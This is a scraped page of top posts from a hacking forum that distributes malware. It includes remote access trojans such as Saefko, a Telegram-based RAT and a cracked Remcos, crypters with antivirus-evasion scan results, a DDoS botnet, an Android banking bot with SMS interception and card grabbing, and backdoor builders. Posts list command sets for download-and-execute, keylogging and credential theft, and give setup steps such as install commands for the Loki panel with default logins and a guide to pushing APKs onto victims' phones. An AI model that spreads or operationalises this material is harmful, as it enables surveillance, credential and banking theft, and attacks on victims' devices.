Jump to content

Welcome to LeVeL23HackTools

Welcome to LeVeL23HackTools, like most online communities you must register to view or post in our community, but don't worry this is a simple free process that requires minimal information for you to signup. Be apart of LeVeL23HackTools by signing in or creating an account.

  • Start new topics and reply to others
  • Subscribe to topics and forums to get email updates
  • Get your own profile page and make new friends
  • Send personal messages to other members.

  • Announcements

    • dEEpEst


      You can download 5 files a day, if you want to make unlimited downloads you must buy PRIV8, you will have access to all the parts of the forum and you will be able to download unlimitedly without restrictions for a lifetime.


Popular Content

Showing most liked content since 10/21/2018 in all areas

  1. 57 points
    Saefko Attack Systems the most advance RAT-BOT-AGENT ever created This is "a multi protocol multi operating system" remote administration tool , This is the first system to use three protocols establishing all time communication , there is four main thing this design provides that no other system provide first Unlimited number of machines to control. Extreme reliability. Android and Windows control at the same time. No port forwarding. No mysql. This project was designed to replace all RAT/BOTS that are made to control remote machine,the problem with all current RATS/BOTS that they are unreliable and limited , you cant in 99.9% of the time have more than 100 machine or victim due to self flooding , self flooding meaning when the client connect to the server directly "when the rat connect to the attacker pc through TCP" . When the number of connected clients increased this acte as flood attack, so you will be limited to some low number and you will end up with lagy unreliable connection to the target machines. That's from the side of TCP rats the other side is the http bots ,that use a remote server containing some php scripts and mysql server , this design can handle unlimited number of machines in theory , but the problem with this design is that you do not have a direct connection to the machine so you are limited to http tasks and this dose not give you much control so that was just a quick short overview on some of extreme problems that RATS/BOTS facing with current techs,in Saefko Attack Systems "SAS" you combining both of these types of connections and adding IRC Protocol to the mix you will end up with extremely reliable connection to the target machine,SAS will handle millions of connections with direct TCP communications established through IRC networks any time any place all wither. Fast Setup Youtube : Main Windows Public HTTP Tasks Windows Build Android Build Command And Control Sections Android Command And Control Sections Android IRC Commands ANDROID COMMANDS [msg] Show toast message. [dexe] Download and execute a file in visible mode eg : 'dexe [Hidden Content]'. [hdexe] Download and execute a file in hidden mode eg : 'dexe [Hidden Content]'. [vistpage] Vist a webpage in visible mode eg : 'vistpage [Hidden Content]'. [hvistpage] Vist a webpage in hidden mode eg : 'hvistpage [Hidden Content]'. [snapshot] Get snapshot from camera eg : 'snapshot CAMERA_INDEX'. [ping] Ping the agent machine to check if still active. [location] Get geo location information based on 'ipinfo.com'. [flashon] Turn the dvice flash on. [flashoff] Turn the dvice flash on. [wakeup] Turn dvice screen on. [screenshot] Take a screenshot to from the target machine. GENERAL COMMANDS [clear] Clear the terminal. [opacity] Change the transparency of the terminal eg : 'opacity 0.4'. [myip] Show your public ip address that currently in use. [showtcpport] Show the public port used for TCP communications. [fontcolor] Change the font color eg : 'fontcolor #FFFFFF'. [ping] Ping the agent machine to check if still active. [info] Tells the agent to identify its machine and return short informations about it. [CTRL + C] CTRL + C to cancel any previous commands. [flashoff] Turn the dvice flash on. [cleanup] Close all windows that created by this control uint. [retcp] Order the TCP agent to reconnect , this command used in case of TCP connection is disconnected. [exit] Close the current agent window. Android TCP Commands Android Private HTTP Tasks HTTP Tasks Types Download And execute Show Message Box Visit Website Shell Commands Now Windows Command And Control Windows IRC Commands WINDOWS COMMANDS [pwd] Show current directory. [screenshot] Take a screenshot to from the target machine. [opencd] Open cd rom. [closecd] Close cd rom. [ping] Ping the agent machine to check if still active. [camlist] Get a list of available camera devices. [snapshot] Get snapshot from camera eg : 'snapshot CAMERA_INDEX'. [location] Get geo location information based on 'ipinfo.com'. [opencd] Open cd rom. [keylogs] Get agent saved keylogs through HTTP drop point. [shell] Run shell commands. [dexe] Download and execute a file in visible mode eg : 'dexe [Hidden Content]'. [hdexe] Download and execute a file in hidden mode eg : 'dexe [Hidden Content]'. [vistpage] Vist a webpage in visible mode eg : 'vistpage [Hidden Content]'. [hvistpage] Vist a webpage in hidden mode eg : 'hvistpage [Hidden Content]'. [uninstall] Uninstall the agent completely from the target machine. GENERAL COMMANDS [clear] Clear the terminal. [opacity] Change the transparency of the terminal eg : 'opacity 0.4'. [myip] Show your public ip address that currently in use. [showtcpport] Show the public port used for TCP communications. [fontcolor] Change the font color eg : 'fontcolor #FFFFFF'. [ping] Ping the agent machine to check if still active. [info] Tells the agent to identify its machine and return short informations about it. [CTRL + C] CTRL + C to cancel any previous commands. [flashoff] Turn the dvice flash on. [cleanup] Close all windows that created by this control uint. [retcp] Order the TCP agent to reconnect , this command used in case of TCP connection is disconnected. [exit] Close the current agent window. Windows TCP Commands Windows Private HTTP Tasks HTTP Tasks Types Download And execute Show Message Box Visit Website Shell Commands Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  2. 49 points
    [Hidden Content] Pass: level23hacktool
  3. 45 points
    Website: [Hidden Content] Download: [Hidden Content] Password: level23hacktool
  4. 34 points
    Scan: [Hidden Content] Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  5. 31 points
    What can you do Show Device's Informations. Upload a file to the Victim. Execute Terminal Commands. Kill a process. Get a text file from Target Get Target Home Folder [Hidden Content]
  6. 28 points
    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  7. 28 points
    Scan: [Hidden Content] Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  8. 26 points
    File Name: uyuy.exe Scan Date: 09-11-2018 11:59:16 Detected by: 8/30 MD5: 4255ef395cb6241332b16c73c2f4f881 Checked by AntiScan.Me [Hidden Content] adaware: Gen:Variant.Ursu.239764 ahnlab: Clean alyac: Clean avast: Clean avg: Clean avira: TR/Dropper.Gen bitdef: Gen:Variant.Ursu.239764 bullguard: Gen:Variant.Ursu.239764 clam: Clean comodo: Clean drweb: Trojan.VbCrypt.68 emsisoft: Clean nod32: a variant of Win32/Injector.BNZ trojan fortinet: Clean fsec: Gen:Variant.Ursu.239764 ikarus: Virus.Win32.VBInject kasper: Clean mcafeetp: Clean mbytes: Clean pandagp: Clean sophos: Clean trend: Clean webroot: Clean mssec: Clean zonealarm: Clean zillya: Clean Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  9. 26 points
    Scan: Download: [HIDE][Hidden Content]] Password: level23acktools.com
  10. 25 points
    Recently added: - Outlook Password Recovery - Thunderbird Password Recovery - Reverse Proxy Download [Hidden Content] Pass level23hacktool
  11. 25 points
    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  12. 24 points
    Download: [hide][Hidden Content]] Password: level23hacktools.com
  13. 22 points
    Free Version Yakuza Crypter Trail 7 days Free version Yakuza Trail 7 days or 100 time usage (which is faster) with different stub than our main project stubs disabeld:startup, monitor,and spread(60% of options disabled). stub pass will be sent on public group only. Here Yakuza Public Area Builder Pass:1delphi Download Yakuza_v6_Limited.zip - MirrorAce Stub Pass:BE12 stub+1_Public.zip (791.01KB) - SendSpace.com
  14. 19 points
    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  15. 19 points
    Download: [hide][Hidden Content]] Password: level23hacktools.com
  16. 17 points
    RAT-via-Telegram Windows Remote Administration Tool via Telegram (Python 2.7) | Originally created by Ritiek Why another one? The current Remote Administration Tools in the market face 2 major problems: Lack of encryption. Require port forwarding in order to control from hundreds of miles. This RAT overcomes both these issues by using the Telegram bot API. Fully encrypted. The data being exchanged cannot be spied upon using MITM tools. Telegram messenger app provides a simple way to communicate to the target without configuring port forward before hand on the target. Features: Keylogger with window title log included Get target PC's Windows version, processor and more Get target PC's IP address information and approximate location on map Delete, Move files Show current directory Change current directory List current or specified directory Download any file from the target Upload local files to the target. Send your image, pdf, exe or anything as file to the Telegram bot Autostart playing a video in fullscreen and no controls for a youtube video on target Take Screenshots Execute any file Access to microphone Start HTTP Proxy Server Freeze target's keyboard Schedule tasks to run at specified datetime Encode/Decode all local files Ping targets Update .exe -- thanks LearnerZone Self-Destruct RAT Change wallpaper from file or url Execute arbitrary python 2.7 on the go Execute cmd shell [TODO] Browser (IE, Firefox, Chrome) cookies retrieval [TODO] Password retrieval [TODO] Monitor web traffic (graphically?) [TODO] Fine-tuning scripting (i.e.: if app x is opened y is executed) [TODO] Freeze target's mouse [TODO] Capture clipboard (Text, Image) [TODO] Hide desktop icons [TODO] Take snapshots from the webcam (if attached) [TODO] Audio compression Thanks Dviros: Chrome login/password retrieval Display ARP table Get active processes and services Shutdown/Reboot computer Display DNS Cache & More coming soon! Screenshots: Installation & Usage: Clone this repository. Set up a new Telegram bot talking to the BotFather. Copy this token and replace it in the beginning of the script. Install the dependencies: pip install -r requirements.txt. Install pyHook 64-bit or 32-bit depending on your system. For 64-bit- pip install pyHook-1.5.1-cp27-cp27m-win_amd64.whl. For 32-bit- pip install pyHook-1.5.1-cp27-cp27m-win32.whl. To run the script: python RATAttack.py. Find your bot on telegram and send some command to the bot to test it. To restrict the bot so that it responds only to you, note down your chat_id from the console and replace it in the script and comment out the line return True. Don't worry, you'll know when you read the comments in the script. - A folder named `RATAttack` will be created in your working directory containing `keylogs.txt` and any files you upload to the bot. Commands: When using the below commands; use / as a prefix. For example: /pc_info. arp - display arp table capture_pc - screenshot PC cmd_exec - execute shell command cp - copy files cd - change current directory delete - delete a file/folder download - download file from target decode_all - decode ALL encoded local files dns - display DNS Cache encode_all - encode ALL local files freeze_keyboard - enable keyboard freeze unfreeze_keyboard - disable keyboard freeze get_chrome - Get Google Chrome's login/passwords hear - record microphone ip_info - via ipinfo.io keylogs - get keylogs ls - list contents of current or specified directory msg_box - display message box with text mv - move files pc_info - PC information ping - makes sure target is up play - plays a youtube video proxy - opens a proxy server pwd - show current directory python_exec - interpret python reboot - reboot computer run - run a file schedule - schedule a command to run at specific time self_destruct - destroy all traces shutdown - shutdown computer tasklist - display services and processes running to - select targets by it's name update - update executable wallpaper - change wallpaper You can copy the above to update your command list via BotFather so you don't have to type them manually. Compiling: How To Compile: Either: Replace your path in compileAndRun.bat (running this will actually run the executable) Or: Run `pyinstaller --onefile --noconsole C:\path\to\RATAttack.py`. You can also pass `--icon=<path\to\icon.ico>` to use any custom icon. Once it is compiled successfully, find the .exe file in C:\Python27\Scripts\dist\. You can change the name of the .exeto anything you wish. BEWARE! If you run the compiled .exe, the script will hide itself and infect your PC to run at startup. You can return to normal by using the /self_destruct option or manually removing C:\Users\Username\AppData\Roaming\Portal directory and C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\portal.lnk (although I recommend removing them manually for the time being). Modifying Settings: You can also modify the name of hidden .exe file and location & name of the folder where the hidden .exe will hide itself. To do this; modify compiled_name and hide_folder respectively. Assign your known chat ids to beginning of RATAttack.py Notes: Currently only Python2 is supported. Python3 support will be added soon! Contributing: This project is still in very early stages, so you can expect some bugs. Please feel free to report them! Even better, send a pull request :) Any new features and ideas are most welcome! Please do submit feature requests by creating Issues Disclaimer: This tool is supposed to be used only on authorized systems. Any unauthorized use of this tool without explicit permission is illegal. License: The MIT License Download: [HIDE][Hidden Content]]
  17. 17 points
    Here you can create your backdoor. Do not use things randomly, because if you misuse the options the backdoor can work badly. If for example you want a backdoor that penetrates without startups, do not put options, leave everything like that, you have to put only the ip and the door. If instead you want the backdoor to start even when the computer is restarted, you only have to put Start Up, if you want also, you can put Installation on (none). If you want you can also create an empty backdoor, like the first one I explained to you, then use hotfusion to put it in start up (not in local machine). If you create a 64-bit backdoor but your pc slave has a 32-bit system, it does not work. If you put the icon on your backdoor, you can not put backdoor + ico build, it makes no sense. So use the options intelligently. For example, if you encrypt, you have to create an empty backdoor with no options, no start up, no icons, no nines and then crypts. Last thing. The backdoors were created without binder. Everything that starts with the backdoor (such as ccleaner) has been inserted directly into the stub. I did not use the binder. Enjoy! Download: [hide][Hidden Content]] Password: level23hacktools.com
  18. 16 points
    ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Один из лучших Crypter, который живёт уже на протяжении года, и по сей день он является FUD ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Сканы: ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- PASS RAR: RC4(xakfor.net) [ XadmWa ] minus MEGAN-35 [ Td/q ] = CAESAR (RC4 minus MEGAN) [ xklkfjrp ] -----> ROT13
  19. 16 points
    android loader installation guide 20/11/17 Server requirements: - OS debian 7.0 or newer - RAM 2 Gb or more - apache 2 - php 5 - mysql 1. bot Open folder 'bot' in Android studio 2.0 or higher Set correct server ip or domain in bot/app/src/main/java/task/loader/Constants.java Build apk 2. panel Upload panel to the server Setup apache with panel/apache_loader.conf Create mysql database named 'loader' and import panel/db_loader.sql Set mysql access data in panel/db.php Copy panel/video/aapt/libc++.so to /usr/lib/ Setup basic auth in panel/video/.htaccess: htpasswd -cb /var/data/loader.passwd USER PASSWORD make panel/tmp writeable 3. usage - install loader on the phone - open panel with default login 'admin' and password '123123' - bot should appear in 'Bots' section - upload target apk (that should be installed by loader) to any host - create new task in Loader panel, set direct url to apk - set number of attemps - how much times loader will propose user to install the target apk - make task 'active' - make sure loader is installed on your device, disable screen - enable screen again - loader will propose you to install the target apk - it will propose user to install every 20 seconds once it will be done Optionally you can show landing page first, set url of the landing in the task settings Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  20. 15 points
    This joint can glue up to two files at a time. An exceptional feature of this joener is a clean stub! Ability to select icons for your gluing. You can add an edition file. Joyner is completely native and has no dependencies. Scan: (I have not uploaded it to Virustotal, it was already uploaded from the beginning by the creator) Stub: [Hidden Content] Builder: [Hidden Content] Download: [HIDE][Hidden Content]] Password level23hacktools.com
  21. 15 points
    Download: [hide][Hidden Content]] Password: level23hacktools.com
  22. 15 points
    Features of the bot: - Graber cards - Spam on user contacts - Calling the number - Forwarding incoming calls - Launching user applications - Automatic withdrawal of fake notifications, with taken bank icons - Interception, block-deleting incoming SMS, sending, including short numbers - Download all user application names - Graber contacts - Screen locker - Launch pages in the browser - Launch user applications - Search for Bank applications - Browser history graber - Socks5 module - Sending USSD - Geolocation - Spam by number base Admin panel: Detailed statistics on countries, app, url histories, selerians, etc. The ability to issue commands to a particular bot, group, as well as all newcomers. Search by imei, sorting by installed applications, online bots, seler, countries. Cleaning of old logs. Separate statistics for traffic. Jabber notification. There is a possibility to load their injections, with the admin panel. Search by SMS, logs. Searching for links by history. The statistics for the tasks that have been issued are fulfilled. Etc. Additional info: The size of the bot is 150 kb. Stable work on Android 4-7. For basic work, root rights are not required. Request admin rights. To change the phone password, you need the admin rights (requested when installing). Change the password to Android Nougat (Android 7) version in part. Sending and intercepting SMS on all versions, deleting up to 4.4, downloading all SMS from 4.4, block SMS over 4.4 via SMS manager / Screen Locker (when locked via SMS manager, SMS is not seen only by the Holder). Permanent withdrawal of bank (fake) notifications with bank icons, the text can be set with the admin panel when you click on the message the injection is started. In the presence of injections of euro countries, they are bundled with a bot. An additional functional is possible. Android Bot Loki We want to offer a bot of our own developments. A completely new bot engine, the wishes of the customers are part of the functions of are automated, advanced functionality. Bot features: - Card grabber - Phone contacts spam - Custom numbers spam - Call to number - Incoming call forwarding - Start user applications - Automatic invoke fake notifications with custom icons - Catch, block, delete incoming SMS. Sent new SMS - Get list of user applications - Contact grabber - Screen locker - Web application browser - Bank applications searching - Browser history grabber - Socks5 module - Geolocation Admin panel: Detalized statistics of countries, app, history, sellers etc ... Ability for send command to one, list , or only new bots. IMEI search. Sort by installed applications, online, sellers, countries. Cleanup old logs Dedicated statistics for sellers. Jabber notifications. Admin panel have an ability to upload your own injects. SMS, logs searching. History links searching. Task statistiks. Additional information: Bot size: 150kb Bot is working with Android 4-7 Root permissions is NOT required for common actions. There are request for getting root permissions Root permissions required for Image phone password changing Phone password changing for All Android Nougat (All Android 7) of Post Send and catch statement SMS works on all All Android versions, the delete works only for 4.4, download and block SMS works All Android 4.4 and newest Permanent display bank notifications with custom text from admin panel. Bot have injects for euro countries. \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Loki admin panel install instructions: apt-get update && apt-get upgrade -y apt-get install apache2 libapache2-mod-php5 mysql-server php5 php5-mysql -y apt-get install default-jre default-jdk -y Debian 7: apt-get install ia32-libs lib32z1 lib32ncurses5 -y Debian 8: dpkg --add-architecture i386 apt-get update apt-get install libstdc++6:i386 libgcc1:i386 zlib1g:i386 libncurses5:i386 lib32z1 lib32ncurses5 Next: wget [Hidden Content] wget -O apktool.jar [Hidden Content] chmod +x ~/apktool.jar chmod +x ~/apktool mv ~/apktool.jar /usr/local/bin/ mv ~/apktool /usr/local/bin/ Next: unpack loki.tar to new dir. something like that: tar xf loki.tar -C /var/www/ change files owner: chown -R www-data:www-data /var/www/ Run: mysql create database loki; grant all privileges on loki.* to loki@localhost identified 'DB_PASSWORD'; grant all privileges on loki.* to loki@localhost identified by 'DB_PASSWORD'; quit import bd file loki4dev.sql: mysql loki < /var/www/site/loki4dev.sql mysql -u root -pbolonka1 loki </var/www/site/loki4dev.sql Edit: /var/www/site/db.php and enter mysql database access: db: loki db user: loki db password: DB_PASSWORD DONE!!!! address admin panel [Hidden Content] or [Hidden Content] login with name bot4fun and password J1HPbmr ...................................................................... Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  23. 14 points
    Mephisto is web tool that you can install on webserver for your targeted attacks, there are plenty of uses for this type of framework.. [Hidden Content]
  24. 14 points
  25. 13 points
    Briefly about the main thing : DarkSky - Botnet, which contains a convenient interface for management, effective and convenient functionality, including: 3 types of DDoS attacks, functions for downloading / uploading / launching any files from all victims in your control panel. The control panel - was developed for tough combat conditions and high traffic volumes. Thanks to modern technologies, the panel has functions to protect against external influences on it, you can notbeafraid that the abuses will find you. This was checked by 3 months, not a single complaint was made to the hosting companies, not one client. 5000r. + Source code + Updates at least a year + I will open a way to add payload (to bypass AB) Bot functionality: + Protection from bot scanning programs: Wireshark, HTTPAnalyzer, ProcessHacker, MonitorTraffic and also continue this list. + HTTP Flood (Reset TCP Flags) - if you read the specification of the protocol tcp, then to perform the load, you need to reset the connection without waiting for a response from the server, this method is used for DDoS attacks on sites. + HTTP Flood (ARMA Method) - synchronizes all active threads and connections among themselves, waits until the request is sent and closes connections, i.e. at the same time sends a bunch of requests on level with all bots ... + SYN Flood - works on two, the above-described mode and waits until the server returns a response. + UDP Flood - sends huge, randomized packets + Additional Loader, if there is no build from the botnet on the PC, this "loader" will load the build (ie recover) + Main Loader - loads and starts the file. + In the panel, you can specify the time for the bots to be banned. + Uninstall build on bots in 1 click in the panel. + Running Proxy servers with different types of HTTP / S, Socks 4/5 with login or password for authorization. + Functions for unloading any files from the victim with the PC, and sending them to the panel. + Functions for working with memory, turning off DEP mode - for writing to memory. + Bypass to bypass UAC'a, works on WinXP. + Exploit SMB (I can include) Download: [hide][Hidden Content]] Password: level23hacktools.com
  26. 13 points
    Download: [HIDE][Hidden Content]] Passwoord: level23hacktools.com
  27. 12 points
    [Hidden Content]
  28. 12 points
    Download: [hide][Hidden Content]] Password: level23hacktools.com
  29. 12 points
    Scan results with stub1: [Hidden Content] Scan results with stub2: [Hidden Content]
  30. 12 points
    Site: [Hidden Content] Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  31. 10 points
  32. 10 points
    [Hidden Content]
  33. 10 points
    [Hidden Content] Vuln Hunter.zip
  34. 10 points
    Download: [hide][Hidden Content]] Password: level23hacktools.com
  35. 10 points
    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  36. 10 points
    [Hidden Content]
  37. 9 points
    Steal all password Strong Keylogger (NjQ8) Steal Clipboard Spread in USB Download: [hide][Hidden Content]] Password: level23hacktools.com
  38. 9 points
    Smoke bot panel version : 02/18 Found it on hacked server enjoy ! [Hidden Content]
  39. 9 points
    Ultimate license is inside Download: [hide][Hidden Content]] Password: level23hacktools.com
  40. 9 points
    The FatRat TheFatRat is a post-exploitation tool that can be used by security professionals, ethical hackers, and malicious attackers. It basically provides the capability to connect via a backdoor, creating a remote access session to the victim machine. The tool compiles malware with well-known payloads that can executed to compromise Windows, Android, and Mac OS systems. For security acolytes the project is an excellent resource for learning some information security hacking techniques. For you professionals, it gives you another tool to hang on your utility belt when performing network assessments. Automating Metasploit Functions: Create backdoor for windows , linux , mac and android Bypass Antivirus Checks for metasploit service and starts if not present Easily craft meterpreter reverse_tcp payloads for Windows, Linux, Android and Mac and another Start multiple meterpreter reverse_tcp listeners Fast Search in Searchsploit File pumper (Increases File Size) Create backdoor with another technique Autorunscript for listeners (Easy to use) Drop into msfconsole Download: [hide][Hidden Content]] Password: level23hacktools.com
  41. 8 points
  42. 8 points
  43. 8 points
    [Hidden Content]
  44. 8 points
    Another release of the popular Email SPAM Prank now coded in Ajax. It runs more faster than HTML Version and use less resources. To get your full version - privateloader@hotmail.com Download: [Hidden Content]+(Public+Ajax+Version).zip Virustotal: [Hidden Content]
  45. 8 points
    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  46. 8 points
  47. 8 points
    REMCOS Professional v1.7 (Cracked and Fixed) Remcos is a lightweight and fast Remote Administration Tool with a wide array of functionalities, contained in a tiny package The Server part, written in C++, is only ~90 kb of size uncompressed and contains all the functions. Performance and speed have been a priority in the development. INFO No dependencies, and fully compatible with any Windows from WinXP to Win10, 32-64 bit, including Server editions. Remcos will not require any extra dependency to run. All it needs is contained in any standard Windows installation. Robust connection: * Robust Keep alive system makes sure your connection with the remote host/s will never get lost. * 100% Encrypted connection protects transmitted data from sniffers. Not a single byte is sent un-encrypted. * Backup connection addresses will make sure your remote host will connect even if one or more addresses go offline. Auto-Tasks: You don't even have to sit at the computer: Download logs and files, and performs other actions automatically on hosts connection. Mass Commands: You can send any command to more then one remote host, or even to all the connected ones in same time. Search for a file name on all your machines network, download&execute a file, shutdown all of them and much more. Surveillance functions: Transform the remote machine in a completely stealth surveillance station. *Password recovery lets you recover remotely saved passwords from all browsers (IE, Firefox, Chrome, Safari, Opera), and various Instant Messaging software (Pidgin, Trillian, Miranda, ICQ, and more.) And from MS Outlook POP3, IMAP...etc *ScreenLogger takes screenshots on a time-interval basis or when the user opens some chosen windows, webpages or programs. SS's are stored encrypted and are erased when the remote operator retrieves them. *Offline Keylogger stores logs totally encrypted, and will wipe them out after sending them to C&C operator. *Online Keylogger lets you see what remote user types (and which window opens) in realtime. *Camera Capture lets you capture a live stream of the remote camera, and save frames to disk. *Microphone Capture lets you capture the audio from the machine's microphone in real-time, or even when you are offline, storing audio files. Extra-Stealth: Want to use Remcos as a stealthy remote surveillance tool? Process Injection, Anti-Analysis techniques, total encryption of connection and stored logs, and full compatibility with exe Protectors, will make it hard to spot. Connections Interface Here you can view all connected hosts,and send commands to one or more of them. Wide array of functions which can be performed on one or more hosts at the same time. Despite its wide range of functionalities, Remcos Server its contained in a single ~90 kb C++ executable. That's because performance has always been a priority in the development, as well as maximum compatibility with any Windows system. Password Recovery Recover remote passwords from any popular browser: Internet Explorer - Google Chrome - Mozilla Firefox - Safari - Opera and from MS Outlook POP3, IMAP...etc and from a wide variety of Instant Messaging software: Pidgin - Trillian - Miranda - ICQ - Digsby - PaltalkScene - Windows MSN/Live Messenger ScreenLogger take automatically screenshots offline, and store them encrypted. View and download screenshots comfortably anytime. Screenshots can be taken each x minutes, or when window title or webpage contains a word from a word-list. This allows you to take screenshots automatically anytime the user opens some webpage or application of interest. Keylogger Remcos includes powerful and versatile Keylogger functionality. Offline Keylogger will automatically log data and store it encrypted on the remote machine. You can retrieve it anytime, manually or automatically via AutoTasks. Remcos Keylogger captures: Keystrokes - Active Window - Clipboard Copy/Paste - Idle time Online Keylogger let's you see what's going on in realtime, without storing any remote log! Any single keystroke will be displayed as soon as typed. Selective Keylogger Want to capture only user input which happens in one or more defined windows, programs or webpages? With the Selective Keylogger mode, the Keylogger will self-activate when user enters a target window, and will self-disable when exits from it. Automatic Tasks Automatically send tasks to hosts as soon as they connect. Download logs and files, update/uninstall your remote client, and more. Without needing your physical presence at the PC. Download: [Hide][Hidden Content]] Password: level23hacktools.com
  48. 7 points
    my [Hidden Content] dont work login detail not work... mi detail is correct!!!!!
  49. 7 points
    [Hidden Content]
  50. 7 points
    Mirror: Download: Click here Password: level23hacktools.com